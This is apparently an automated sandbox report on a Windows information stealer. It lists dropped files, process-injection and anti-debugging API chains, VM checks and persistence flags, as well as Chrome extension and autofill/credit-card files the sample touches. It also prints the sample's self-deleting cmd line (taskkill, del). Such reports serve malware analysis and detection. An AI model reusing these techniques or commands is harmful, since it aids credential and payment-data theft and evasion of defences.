Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe.wdlo (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Application Data\Application Data\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe.wdlo (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\freebl3[1].dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe

Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,		2_2_0040E670
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,		8_2_0040E670

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe

Thread delayed: delay time: 900000

Jump to behavior

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	API call chain: ExitProcess graph end node	graph_0-15622
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	API call chain: ExitProcess graph end node	graph_2-31834
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\

Source: Q5W0I0pzFI.exe, 00000009.00000002.440476743.0000000000778000.00000004.00000020.00020000.00000000.sdmp, Q5W0I0pzFI.exe, 00000009.00000002.440580746.0000000000808000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000010.00000002.537060207.00000000007EA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000010.00000002.537083564.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000010.00000002.536897185.0000000000788000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Q5W0I0pzFI.exe, 00000008.00000002.629017228.0000000002F82000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 00#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	2_2_00410160
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	2_2_0040F730
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	8_2_0040F730
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_00410160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	8_2_00410160

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe

Code function: 0_2_0040A04E LoadLibraryA,GetProcAddress,

0_2_0040A04E

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 6_2_02150042 push dword ptr fs:[00000030h]		6_2_02150042
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Code function: 7_2_02210042 push dword ptr fs:[00000030h]		7_2_02210042

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe

Code function: 0_2_00410900 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00410900

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe

Code function: 0_2_0040A321 __wremove,__wrename,GetConsoleAliasExesA,BuildCommDCBAndTimeoutsA,FillConsoleOutputCharacterW,PeekNamedPipe,GetConsoleAliasesLengthA,OpenWaitableTimerW,GetLastError,OpenMutexW,WriteProfileStringW,GetPrivateProfileIntA,DebugBreak,GetModuleHandleA,GetPrivateProfileIntA,EnumSystemLocalesW,GetSystemTimeAdjustment,DebugBreak,MoveFileWithProgressW,SetCommState,CreateMailslotW,WriteConsoleInputW,GetConsoleAliasExesLengthA,SetComputerNameA,GlobalGetAtomNameW,FreeConsole,CreateIoCompletionPort,GetConsoleCP,FreeEnvironmentStringsA,UnlockFile,LoadLibraryA,lstrcpyA,GetProcAddress,VirtualProtect,WriteConsoleW,DebugBreak,LoadLibraryA,lstrlenA,EnumResourceTypesA,FlushConsoleInputBuffer,FlushConsoleInputBuffer,SetThreadAffinityMask,PulseEvent,OutputDebugStringA,ReadConsoleInputW,GetPrivateProfileIntA,CreateActCtxA,GetPrivateProfileStringA,GetOEMCP,CopyFileA,InterlockedExchangeAdd,WaitForDebugEvent,FlushConsoleInputBuffer,GetConsoleAliasExesLengthW,GetModuleFileNameA,FreeLibraryAndExitThread,

0_2_0040A321

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe

Code function: 2_2_00447CAC __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

2_2_00447CAC

Source: C:\Windows\SysWOW64\taskkill.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 0_2_0040DC60 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0040DC60
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 0_2_00416C30 SetUnhandledExceptionFilter,	0_2_00416C30
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 0_2_00410900 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00410900
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 0_2_0040C6D0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040C6D0
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_004329EC
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 2_2_004329BB SetUnhandledExceptionFilter,	2_2_004329BB
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_004329EC
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_004329BB SetUnhandledExceptionFilter,	8_2_004329BB

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Memory written: C:\Users\user\Desktop\Q5W0I0pzFI.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Memory written: C:\Users\user\Desktop\Q5W0I0pzFI.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Memory written: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Memory written: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Memory written: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Memory written: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe base: 400000 value starts with: 4D5A

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe

Code function: 6_2_02150110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,

6_2_02150110

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Process created: C:\Users\user\Desktop\Q5W0I0pzFI.exe "C:\Users\user\Desktop\Q5W0I0pzFI.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Process created: C:\Users\user\Desktop\Q5W0I0pzFI.exe "C:\Users\user\Desktop\Q5W0I0pzFI.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Process created: C:\Users\user\Desktop\Q5W0I0pzFI.exe "C:\Users\user\Desktop\Q5W0I0pzFI.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Process created: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe --Task	Jump to behavior
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Process created: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe "C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Process created: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe "C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe" --AutoStart	Jump to behavior
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Process created: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe "C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe"
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Process created: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe "C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe" --AutoStart
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe" & del C:\ProgramData\*.dll & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im build2.exe /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe

Code function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,

2_2_00419F90

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im build2.exe /f

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: __wremove,__wrename,GetConsoleAliasExesA,BuildCommDCBAndTimeoutsA,FillConsoleOutputCharacterW,PeekNamedPipe,GetConsoleAliasesLengthA,OpenWaitableTimerW,GetLastError,OpenMutexW,WriteProfileStringW,GetPrivateProfileIntA,DebugBreak,GetModuleHandleA,GetPrivateProfileIntA,EnumSystemLocalesW,GetSystemTimeAdjustment,DebugBreak,MoveFileWithProgressW,SetCommState,CreateMailslotW,WriteConsoleInputW,GetConsoleAliasExesLengthA,SetComputerNameA,GlobalGetAtomNameW,FreeConsole,CreateIoCompletionPort,GetConsoleCP,FreeEnvironmentStringsA,UnlockFile,LoadLibraryA,lstrcpyA,GetProcAddress,VirtualProtect,WriteConsoleW,DebugBreak,LoadLibraryA,lstrlenA,EnumResourceTypesA,FlushConsoleInputBuffer,FlushConsoleInputBuffer,SetThreadAffinityMask,PulseEvent,OutputDebugStringA,ReadConsoleInputW,GetPrivateProfileIntA,CreateActCtxA,GetPrivateProfileStringA,GetOEMCP,CopyFileA,InterlockedExchangeAdd,WaitForDebugEvent,FlushConsoleInputBuffer,GetConsoleAliasExesLengthW,GetModuleFileNameA,FreeLibraryAndExitThread,	0_2_0040A321
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: GetLocaleInfoA,	0_2_00424430
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	2_2_0043404A
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	2_2_00438178
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	2_2_00440116
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_004382A2
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	2_2_0043834F
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	2_2_00438423
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	2_2_004335E7
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: EnumSystemLocalesW,	2_2_004387C8
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: GetLocaleInfoW,	2_2_0043884E
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	2_2_00432B6D
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,	2_2_00437BB3
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: EnumSystemLocalesW,	2_2_00437E27
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	2_2_00437E83
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	2_2_00437F00
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	2_2_0042BF17
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	2_2_00437F83
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	2_2_00432FAD
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	8_2_0043404A
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	8_2_00438178
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	8_2_00440116
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	8_2_004382A2
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	8_2_0043834F
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	8_2_00438423
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	8_2_004335E7
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: EnumSystemLocalesW,	8_2_004387C8
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: GetLocaleInfoW,	8_2_0043884E
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	8_2_00432B6D
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,	8_2_00437BB3
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: EnumSystemLocalesW,	8_2_00437E27
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	8_2_00437E83
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	8_2_00437F00
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	8_2_0042BF17
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	8_2_00437F83
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	8_2_00432FAD

Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Queries volume information: C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ\files\Autofill\Google Chrome_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Queries volume information: C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ\files\CC\Google Chrome_Default.txt VolumeInformation
